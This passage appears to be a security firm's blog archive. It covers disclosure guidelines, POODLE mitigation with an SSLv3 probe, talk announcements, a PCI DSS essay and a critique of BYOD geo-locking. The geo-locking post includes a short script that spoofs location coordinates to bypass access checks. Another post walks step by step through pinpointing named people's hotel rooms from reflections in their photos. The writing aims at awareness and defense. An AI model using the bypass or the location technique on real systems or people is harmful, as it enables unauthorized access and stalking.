  • Always be collaborative with the researcher/company, even if you don’t like the reporter
  • Always thank the researcher/company for the report, even if you don’t like the reporter
  • Ask the reporter for help if needed, and work together with the reporter to find better solutions
  • Agree on a time for releasing a fix
  • Agree on a time for publicly disclosing the vulnerability
  • Release the fix on time and alert customers

That’s it! Not so difficult. Any company that produces software should follow these simple guidelines at a minimum.

It comes down to this: If you produce software, consider the possibility that your product will have security vulnerabilities and plan accordingly. You will do yourself a big favor, save money, and possibly save your company’s reputation too.
RESEARCH | October 17, 2014

Vicious POODLE Finally Kills SSL

The poodle must be the most vicious dog, because it has killed SSL.

 

POODLE is the latest in a rather lengthy string of vulnerabilities in SSL (Secure Sockets Layer) and a more recent protocol, TLS (Transport Layer Security). Both protocols secure data that is being sent between applications to prevent eavesdropping, tampering, and message forgery.

POODLE (Padding Oracle On Downgraded Legacy Encryption) rings the death knell for our 18-year-old friend SSL version 3.0 (SSLv3), because at this point, there is no truly safe way to continue using it.

Google announced Tuesday that its researchers had discovered POODLE. The announcement came amid rumors about the researchers' security advisory white paper, which details the vulnerability and had been circulating internally.

SSLv3 had survived numerous prior vulnerabilities, including SSL renegotiation, BEAST, CRIME, Lucky 13, and RC4 weaknesses. Finally, its time has come; SSLv3 is long overdue for deprecation.

The security industry’s initial view is that POODLE will not be as devastating as other recent vulnerabilities such as Heartbleed, a TLS bug. After all, POODLE is a client-side attack; the others were direct server-side attacks.

However, I believe POODLE will ultimately have a larger overall impact than Heartbleed. Even the hundreds of thousands of applications that use a more recent TLS protocol still use SSLv3 as part of backward compatibility. In addition, some applications that directly use SSLv3 may not support any version of TLS; for these, there might not be a quick fix, if there will be one at all.


POODLE attacks the SSLv3 block ciphers by abusing the non-deterministic nature of CBC cipher padding. The Message Authentication Code (MAC), which checks the integrity of every message after decryption, does not cover these padding bytes. What does this mean? The padding can't be fully verified. In other words, this attack is very capable of determining the value of HTTPS cookies. This is the heart of the problem. That might not seem like a huge issue until you consider that this may be a session cookie, and the user's session could potentially be compromised.

TLS version 1.0 (TLSv1.0) and higher versions are not affected by POODLE because these protocols are strict about the contents of the padding bytes. Therefore, TLSv1.0 is still considered safe for CBC mode ciphers. However, we shouldn’t let that lull us into complacency. Keep in mind that even the clients and servers that support recent TLS versions can force the use of SSLv3 by downgrading the transmission channel, which is often still supported. This ‘downgrade dance’ can be triggered through a variety of methods. What’s important to know is that it can happen.

There are a few ways to prevent POODLE from affecting your communication:

Plan A: Disable SSLv3 for all applications. This is the most effective mitigation for both clients and servers.

Plan B: As an alternative, you could disable all CBC ciphers for SSLv3. This will protect you from POODLE but leaves RC4 as the only remaining "strong" cryptographic cipher, which, as mentioned above, has had weaknesses in the past.

Plan C: If an application must continue supporting SSLv3 in order to work correctly, implement the TLS_FALLBACK_SCSV mechanism. Some vendors are taking this approach for now, but it is a coping technique, not a solution. It addresses problems with retried connections and prevents reversion to earlier protocols, as described in the document TLS Fallback Signaling Cipher Suite Value for Preventing Protocol Downgrade Attacks (Draft Released for Comments).
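
If you want to verify whether one of your own servers still accepts SSLv3, a probe can be sketched as follows; it assumes a Python build whose OpenSSL still exposes the protocol (many modern builds do not, which is itself good news):

    # Attempt an SSLv3-only handshake; success means the server still accepts it
    import socket
    import ssl

    def accepts_sslv3(host, port=443):
        if not hasattr(ssl, "PROTOCOL_SSLv3"):
            raise RuntimeError("local OpenSSL build no longer supports SSLv3")
        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv3)
        try:
            with socket.create_connection((host, port), timeout=5) as sock:
                with ctx.wrap_socket(sock):
                    return True  # handshake completed over SSLv3
        except ssl.SSLError:
            return False

    print(accepts_sslv3("example.com"))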

How to Implement Plan A

With no solution that would allow truly safe continued use of SSLv3, you should implement Plan A: Disable SSLv3 for both server and client applications wherever possible, as described below.

Disable SSLv3 for Browsers

  • Chrome: Add the command-line flag --ssl-version-min=tls1 so the browser uses TLSv1.0 or higher.
  • Internet Explorer: Go to IE's Tools menu -> Internet Options -> Advanced tab. Near the bottom of the tab, clear the Use SSL 3.0 checkbox.
  • Firefox: Type about:config in the address bar and set security.tls.version.min to 1.
  • Adium/Pidgin: Clear the Force Old-Style SSL checkbox.

Note: Some browser vendors are already issuing patches and others are offering diagnostic tools to assess connectivity.

If your device has multiple users, secure the browsers for every user. Your mobile browsers are vulnerable as well.

Disable SSLv3 on Server Software

  • Apache: Add -SSLv3 to the SSLProtocol line.
  • IIS 7: Because this is an involved process that requires registry tweaking and a reboot, please refer to Microsoft's instructions: https://support.microsoft.com/kb/187498/en-us
  • Postfix: In main.cf, adopt the setting smtpd_tls_mandatory_protocols=!SSLv3 and ensure that !SSLv2 is present too.

Stay alert for news from your application vendors about patches and recommendations.

POODLE is a high risk for payment gateways and other applications that might expose credit card data and must be fixed in 30 days, according to Payment Card Industry standards. The clock is ticking.

Conclusion

Ideally, the security industry should move to recent versions of the TLS protocol. Each iteration has brought improvements, yet adoption has been slow. For instance, TLS version 1.2, introduced in mid-2008, was scarcely implemented until recently, and many services that support TLSv1.2 are still required to support the older TLSv1.0 because clients don't yet support the newer protocol version.

A draft of TLS version 1.3 released in July 2014 removes support for features that were discovered to make encrypted data vulnerable. Our world will be much safer if we quickly embrace it.

Robert Zigweid

PRESENTATION | July 30, 2014

DC22 Talk: Killing the Rootkit

By Shane Macaulay

I'll be at DEF CON 22 to present information about a high-assurance tool/technique that helps to detect hidden processes (hidden by a DKOM-type rootkit). It works very well, with only a little bit of testing required (not very "abortable": http://takahiroharuyama.github.io/blog/2014/04/21/memory-forensics-still-aborted/). The process also works recursively (detecting host and guest processes inside a host memory dump).
Plus, I will also be at our IOAsis (http://ioasislasvegas.eventbrite.com/?aff=PRIOASIS), so come through for a discussion and a demo.
PRESENTATION | June 16, 2014

Video: Building Custom Android Malware for Penetration Testing

By Robert Erbes  @rr_dot 
 
In this presentation, I provide a brief overview of the Android environment and a somewhat philosophical discussion of malware. I also take a look at possible Android attacks in order to help you pentest your organization's defenses against the increasingly common Bring Your Own Device scenario.

INSIGHTS | May 7, 2014

Glass Reflections in Pictures + OSINT = More Accurate Location

By Alejandro Hernández – @nitr0usmx

Disclaimer: The aim of this article is to help people be more careful when taking pictures through windows, because they might inadvertently reveal their location. The technique presented here could be used for many different purposes, such as tracking down the location of the bad guys, simply finding out which hotel that nice room is in, or, for some people, following the tracks of their favorite artist.
All of the pictures presented here were posted by their owners on Twitter. The tools and information used to determine the locations where the pictures were taken are all publicly available on the Internet. No illegal actions were performed in the work presented here.

 
 
Introduction
Travelling can be enriching and inspiring, especially if you’re in a place you haven’t been before. Whether on vacation or travelling for business, one of the first things that people usually do, including myself, after arriving in their hotel room, is turn on the lights (even if daylight is still coming through the windows), jump on the bed to feel how comfortable it is, walk to the window, and admire the view. If you like what you see, sometimes you grab your camera and take a picture, regardless of reflections in the window.
Without considering geolocation metadata [1] (if enabled), reflections could be a way to get more accurate information about where a picture was taken. How could one of glass’ optical properties [2], reflection, disclose your location? Continue reading.
Of course, pictures taken from windows disclose location information such as the city and/or streets; however, people don't always disclose the specific name of the place where they're standing. Here is where reflections could be useful.
Sometimes, not all of the time, but sometimes, reflections contain recognizable elements that with a little extra help, such as OSINT (Open Source Intelligence) [3], could reveal a more accurate location. The OSINT elements that I used include:
  • Google Earth 3D Buildings (http://www.google.com/earth/)
  • Google Maps (and Street View) (http://maps.google.com)
  • Emporis (building information) (http://www.emporis.com)
  • SkyscraperPage (building information) (http://skyscraperpage.com)
  • Foursquare (pictures uploaded by people) (http://foursquare.com)
  • TripAdvisor (pictures uploaded by people) (http://www.tripadvisor.com)
  • Hotels' websites
  • Google.com
In the following case studies, I’ll present step-by-step instructions for how to get more accurate information about where a picture was taken using reflections.
CASE #1 – Miami, FL
Searching for “hotel view” pictures on Twitter, I found this one from Scott Hoying (a member of Pentatonix, an a cappella group of five vocalists):
 
Looking at his previous tweet:
 
We know he was in Miami, but where exactly? Whether or not you've been to Miami, it's difficult to recognize the buildings outside the window:
 
 So, I went to Wikipedia to get the name of every member of the band:
I looked for them on Twitter and Instagram. Only one other member had published a picture from what appeared to be the same hotel:
It was relatively easy to find that view with Google Earth:
However, from that perspective, there are three hotels:
So, it's time to focus on the reflected elements present in the picture (the same element reflected at different angles, and the portraits) as well as the pattern on the bed cover:
Two great resources for reference pictures, in addition to hotels’ websites, are Foursquare and TripAdvisor (some people like to show where they’re staying). So, after a couple of minutes analyzing pictures of the three possible hotels, I finally found our reflected elements in pictures uploaded by people and on the hotel’s website itself:
After some minutes, we can conclude that the band stayed at the Epic Hotel and, perhaps, in a Water View suite:
 
 
CASE #2 – Vancouver, Canada
The following picture was posted by a friend of mine with the comment that she was ready for her talk at the #XXXX2014 conference in #Vancouver. The easiest way to get her location would have been to look up the list of partnering hotels for speakers at the XXXX2014 conference, but what if the name of the conference hadn't been available?
Let’s take the longer but more interesting path, starting with only the knowledge that this picture was taken in Vancouver:
The square lamp reflected is pretty clear, isn’t it? ;-). First, let’s find that building in front. For that, you could go straight to Google Earth with the 3D buildings layout enabled, but I preferred to dive into Vancouver’s pictures in Emporis:
We’ve found it’s the Convention Centre (and its exact location evidently). Now, it’s easy to match the perspective from which the picture was taken using Google Earth’s 3D buildings layout:
We see it, but where are we standing? Another useful OSINT resource I used was the SkyscraperPage for Vancouver, which shows us two options:
 
By clicking on each mark we can see more detailed information. According to this website, the one on the right is used only for offices and retail, but not for lodging: 
However, the other one seems to be our building:
A quick search leads us to the Fairmont Pacific Rim’s Website, where it’s easy to find pictures from inside the hotel:
The virtual tour for the Deluxe Room has exactly the same view:
Turn our virtual head to the left… and voilà, our square lamp:
Now, let's find out how high up the picture was taken. Let's view our hotel from the Convention Centre's perspective and estimate the floor:
From my perspective, it appears to be between the 17th and 20th floor, so I asked the person who took the picture to corroborate:
 
CASE #3 – Des Moines, IA – 1
An easy one: there are not many tall buildings in Des Moines, Iowa, so it was fairly easy to spot this one:
It seems that the building in front is a parking garage. The drapes look narrow and are white/pearl in color. The fans on the rooftop were easy to locate on Google Maps:
And we could corroborate using the Street View feature:
We found it was the Des Moines Marriott Downtown. Looking for pictures on TripAdvisor, we found what seems to be the same drapery:
Which floor? Let’s move our head and look towards the window where the picture was taken:
The 3D model also helps:
And… almost!
CASE #4 – Des Moines, IA – 2
Another easy example from the same hotel as the previous case. Look at the detailed reflections: the beds, the portraits, the TV, etc.
These were easy-to-spot elements using Foursquare and TripAdvisor:
Misc. Ideas / Further Research
While I was brainstorming about reflections with my friend Diego Madero, he suggested going deeper by using image processing to separate the reflections from the original picture. It's definitely a good idea; however, it takes time to do this (as far as I know).
We also discussed the idea that you could use the information disclosed in reflections to develop a profile of an individual. For example, if the person called room service (plates and bottles reflected), what brand of laptop they are using (logo reflected), or whether they are storing something in the safe (if it’s closed or there’s an indicator like an LED perhaps).
Conclusion
Clear and simple: the reflected images in pictures might disclose information that you wouldn’t be willing to share, such as your location or other personal details. If you don’t want to disclose your location, eliminate reflections by choosing a better angle or simply turning off all of the lights inside the room (including the TV) before taking the picture.
Also, it’s evident that reflections are not only present in windows. While I only considered reflections in windows from different hotels, other things can reflect the surrounding environment:
       “44 Impressive Examples of Reflection Photography”
Finally, do not forget that a reflection could be your enemy.
Recommendations
Here are some other useful links:
       “How to Eliminate Reflections in Glasses in Portraits”
       “How to remove the glare and brightness in an image (Image preprocessing)”
Thanks for reading.
References:
[1] “Geolocation”
[2] “Glass – Optical Properties”
[3] “OSINT – Open Source Intelligence”
INSIGHTS | February 19, 2014

PCI DSS and Security Breaches

Every time an organization suffers a security breach and cardholder data is compromised, people question the effectiveness of the Payment Card Industry Data Security Standard (PCI DSS). Blaming PCI DSS for the handful of companies that are breached every year shows a lack of understanding of the standard’s role. 
Two major misconceptions are responsible for this.
 
First, PCI DSS is a compliance standard. An organization can be compliant today and not tomorrow. It can be compliant when an assessment is taking place and noncompliant the minute the assessment is completed.
Unfortunately, some organizations don’t see PCI DSS as a standard that applies to their day-to-day operations; they think of it as a single event that they must pass at all costs. Each year, they desperately prepare for their assessment and struggle to remediate the assessor’s findings before their annual deadline. When they finally receive their attestation, they check out and don’t think about PCI DSS compliance until next year, when the whole process starts again. 
 
Their information security management system is immature, ad-hoc, perhaps even chaotic, and driven by the threat of losing a certificate or being fined by their processor.
 
To use an analogy, PCI DSS compliance is not a race to a destination, but how consistently well you drive to that destination. Many organizations accelerate from zero to sixty in seconds, brake abruptly, and start all over again a month later. The number of security breaches will be reduced as soon as organizations and assessors both understand that a successful compliance program is not a single state but an ongoing process. As such, an organization that has a mature and repeatable process will be compliant continuously, with rare exceptions, and not only at the time of the assessment.
 
Second, in the age of Advanced Persistent Threats (APTs), the challenge for most organizations is not whether they can successfully prevent an attack from ever occurring, but how quickly they can become aware that a breach has actually occurred.
 
PCI DSS requirements can be classified into three categories:  
 
1. Requirements intended to prevent an incident from happening in the first place. 
These requirements include implementing network access controls, configuring systems securely, applying periodic security updates, performing periodic security reviews, developing secure applications, providing security awareness to the staff, and so on. 
 

2. Requirements designed to detect malicious activities.
These requirements involve implementing solutions such as antivirus software, intrusion detection systems, and file integrity monitoring.


3. Requirements designed to ensure that if a security breach occurs, actions are taken to respond to and contain the security breach, and ensure evidence will exist to identify and prosecute the attackers.

 
Too many organizations focus their compliance resources on the first group of requirements. They give the second and third groups as little attention as possible. 
 
This is painfully obvious. According to the Verizon Data Breach Investigations Report (DBIR) and public information available for the most recent company breaches, most organizations become aware of a security breach weeks or even months after the initial compromise, and only when notified by the payment card brands or law enforcement. This confirms a clear reality: breached organizations do not have the proper tools and/or qualified staff to monitor their security events and logs.
 
Once all the preventive and detective security controls required by PCI DSS have been properly implemented, the only thing left for an organization is to thoroughly monitor logs and events. The goal is to detect anomalies and take any necessary actions as soon as possible.
 
Having sharp individuals in this role is critical for any organization. The smarter the individuals doing the monitoring are, the less opportunity attackers have to get to your data before they are discovered. 
 
You cannot avoid getting hacked. Sooner or later, to a greater or lesser degree, it will happen. What you can really do is monitor and investigate continuously.
 

 

In PCI DSS compliance, monitoring is where companies are really failing.
INSIGHTS | May 7, 2013

Bypassing Geo-locked BYOD Applications

In the wake of increasingly lenient BYOD policies within large corporations, there’s been a growing emphasis upon restricting access to business applications (and data) to specific geographic locations. Over the last 18 months more than a dozen start-ups in North America alone have sprung up seeking to offer novel security solutions in this space – essentially looking to provide mechanisms for locking application usage to a specific location or distance from an office, and ensuring that key data or functionality becomes inaccessible outside these prescribed zones.
These “Geo-locking” technologies are in hot demand as organizations try desperately to regain control of their networks, applications and data.

Over the past 9 months I’ve been asked by clients and potential investors alike for advice on the various technologies and the companies behind them. There’s quite a spectrum of available options in the geo-locking space; each start-up has a different take on the situation and has proposed (or developed) a unique way in tackling the problem. Unfortunately, in the race to secure a position in this evolving security market, much of the literature being thrust at potential customers is heavy in FUD and light in technical detail.
It may be because marketing departments are riding roughshod over the technical folks in order to establish these new companies, but in several of the solutions being proposed I've had concerns over the scope of the security element being offered. It's not that the approaches being marketed aren't useful or won't work; it's more that they've defined the problem they're aiming to solve so narrowly that they've developed what I can only describe as tunnel vision regarding the spectrum of threats organizations are likely to face in the BYOD realm.
In the meantime I wanted to offer this quick primer on the evolving security space that has become BYOD geo-locking.
Geo-locking BYOD
The general premise behind the current generation of geo-locking technologies is that each BYOD gadget will connect wirelessly to the corporate network and interface with critical applications. When the device is moved away from the location, those applications and data should no longer be accessible.
There are a number of approaches, but the most popular strategies can be categorized as follows:
  1. Thick-client – A full-featured application is downloaded to the BYOD gadget and typically monitors physical location elements using telemetry from GPS or the wireless carrier directly. If the location isn’t “approved” the application prevents access to any data stored locally on the device.
  2. Thin-client – a small application or driver is installed on the BYOD gadget to interface with the operating system and retrieve location information (e.g. GPS position, wireless carrier information, IP address, etc.). This application then incorporates this location information into requests to access applications or data stored on remote systems – either through another on-device application or over a Web interface.
  3. Share-my-location – Many mobile operating systems include opt-in functionality to “share my location” via their built-in web browser. Embedded within the page request is a short geo-location description.
  4. Signal proximity – The downloaded application or driver will only interface with remote systems and data if the wireless channel being connected to by the device is approved. This is typically tied to WiFi and nanocell routers with unique identifiers and has a maximum range limited to the power of the transmitter (e.g. 50-100 meters).

The critical problem with the first three geo-locking techniques can be summed up simply as “any device can be made to lie about its location”.

The majority of start-ups have simply assumed that the geo-location information coming from the device is correct – and have not included any means of securing the integrity of that device’s location information. A few have even tried to tell customers (and investors) that it’s impossible for a device to lie about its GPS location or a location calculated off cell-tower triangulation. I suppose it should not be a surprise though – we’ve spent two decades trying to educate Web application developers to not trust client-side input validation and yet they still fall for web browser manipulations.
A quick search for “fake location” on the Apple and Android stores will reveal the prevalence and accessibility of GPS fakery. Any other data being reported from the gadget – IP address, network MAC address, cell-tower connectivity, etc. – can similarly be manipulated. In addition to manipulation of the BYOD gadget directly, alternative vectors that make use of private VPNs and local network jump points may be sufficient to bypass thin-client and “share-my-location” geo-locking application approaches.
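
To make that concrete, here is a hedged sketch of defeating a thin-client check; the endpoint, header, and parameter names are invented. If the client embeds its coordinates in each request, nothing stops a modified client from embedding someone else's:

    # A thin-client geo-lock trusts whatever coordinates the device reports;
    # a tampered client simply reports coordinates inside the approved zone
    import requests

    FAKE_OFFICE = {"lat": 40.7128, "lon": -74.0060}  # not where we really are

    r = requests.get("https://corp.example.com/api/records",
                     headers={"Authorization": "Bearer <token>"},
                     params=FAKE_OFFICE)
    print(r.status_code)  # 200 means the location was taken at face value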
That doesn’t mean that these geo-locking technologies should be considered unicorn pelts, but it does mean that organization’s seeking to deploy these technologies need to invest some time in determining the category of threat (and opponent) they’re prepared to combat.
If the worst case scenario is a nurse losing a hospital iPad and an inept thief trying to access patient records from another part of the city, then many of the geo-locking approaches will work quite well. However, if the scenario is a tech-savvy reporter paying the nurse for access to the hospital iPad and prepared to install a few small applications that manipulate the geo-location information in order to remotely access celebrity patient records… well, then you'll need a different class of defense.
Given the rapid evolution of BYOD geo-locking applications and the number of new businesses offering security solutions in this space, my advice is two-fold – determine the worst case scenarios you’re trying to protect against, and thoroughly assess the technology prior to investment. Don’t be surprised if the marketing claims being made by many of these start-ups are a generation or two ahead of what the product is capable of performing today.
Having already assessed or reviewed the approaches of several start-ups in this particular BYOD security realm, I believe some degree of skepticism and caution is warranted.
— Gunter Ollmann, CTO IOActive